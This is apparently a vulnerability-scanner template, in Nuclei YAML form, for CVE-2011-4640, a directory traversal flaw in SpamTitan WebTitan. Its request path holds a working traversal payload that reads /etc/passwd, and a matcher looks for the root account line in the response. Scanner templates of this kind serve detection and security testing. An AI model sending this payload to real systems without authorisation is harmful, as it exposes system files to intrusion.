36 lines
994 B
YAML
36 lines
994 B
YAML
|
id: CVE-2011-4640
|
||
|
|
||
|
info:
|
||
|
name: WebTitan Versions prior to 3.60 - Local File Inclusion
|
||
|
author: ctflearner
|
||
|
severity: medium
|
||
|
description: Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2011-4640
|
||
|
- https://www.exploit-db.com/exploits/37943
|
||
|
|
||
|
classification:
|
||
|
cvss-metrics: AV:N/AC:L/Au:S/C:P/I:N/A:N
|
||
|
cvss-score: 4.0
|
||
|
cve-id: CVE-2011-4640
|
||
|
cwe-id: CWE-22
|
||
|
cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
|
||
|
tags: lfi,SpamTitan, WebTitan,cve-2011
|
||
|
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}//logs-x.php? jaction=view&fname=../../../../../etc/passwd"
|
||
|
|
||
|
stop-at-first-match: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|